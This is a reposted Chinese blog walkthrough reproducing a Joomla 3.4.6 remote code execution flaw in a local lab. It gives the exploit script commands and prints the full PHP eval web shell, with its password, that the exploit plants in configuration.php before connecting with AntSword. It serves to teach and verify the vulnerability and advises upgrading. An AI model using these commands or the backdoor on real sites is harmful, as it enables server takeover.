首页 > 其他 > 详细

Joomla 3.4.6 Remote Code Execution漏洞复现

时间:2019-10-10 15:05:00      阅读:84      评论:0      收藏:0      [点我收藏+]

0x00:简介

  • Joomla是一套全球有名的CMS系统。
  • Joomla基于PHP语言加上MySQL数据库所开发出来的WEB软件系统,目前最新版本是3.9.12。
  • Joomla可以在多种不同的平台上部署并且运行。

技术分享图片

0x01:环境配置

靶机ip:192.168.204.129
环境下载:https://downloads.joomla.org/it/cms/joomla3/3-4-6
php版本:PHP 5.3.10以上

在window7下使用phpstudy搭建,将下载的压缩包解压到phpstudy的www目录下(根据自己)。然后输入http://192.168.204.129/exploit/Joomla 进行安装。然后按照提示进行配置。如图:

技术分享图片

 

技术分享图片0x02:漏洞复现

漏洞位置

http://x.x.x.x/configuration.php

 影响范围:3.0.0-3.4.6 

技术分享图片

漏洞利用

  • 使用脚本进行验证:显示Vulnerable证明存在漏洞
python3 Joomla-3.4.6-RCE.py -t http://192.168.204.129/exploit/Joomla/

技术分享图片

 

 

  • 漏洞利用

在configuration.php中写入一句话木马,木马连接密码mbvmmqcrhfnsowwnyvhkkwjejbpytgnznswyefystnqbrirvvg

python3 Joomla-3.4.6-RCE.py -t http://192.168.204.129/exploit/Joomla/ --exploit -l 192.168.204.129 -p 8080

 

 

 

技术分享图片

 

在末尾写入了一句话,因为虚拟机没装什么编辑器。完整的写入代码为:

if(isset($_POST[‘mbvmmqcrhfnsowwnyvhkkwjejbpytgnznswyefystnqbrirvvg‘])) eval($_POST[‘mbvmmqcrhfnsowwnyvhkkwjejbpytgnznswyefystnqbrirvvg‘]);

技术分享图片

尝试用antsword连接

 

 技术分享图片

 

Joomla_cms建议更新到最新版本3.9.12

参考文章格式

洛米唯熊复现文章

RCE利用脚本:https://github.com/momika233/Joomla-3.4.6-RCE

Joomla 3.4.6 Remote Code Execution漏洞复现

原文:https://www.cnblogs.com/BOHB-yunying/p/11647644.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!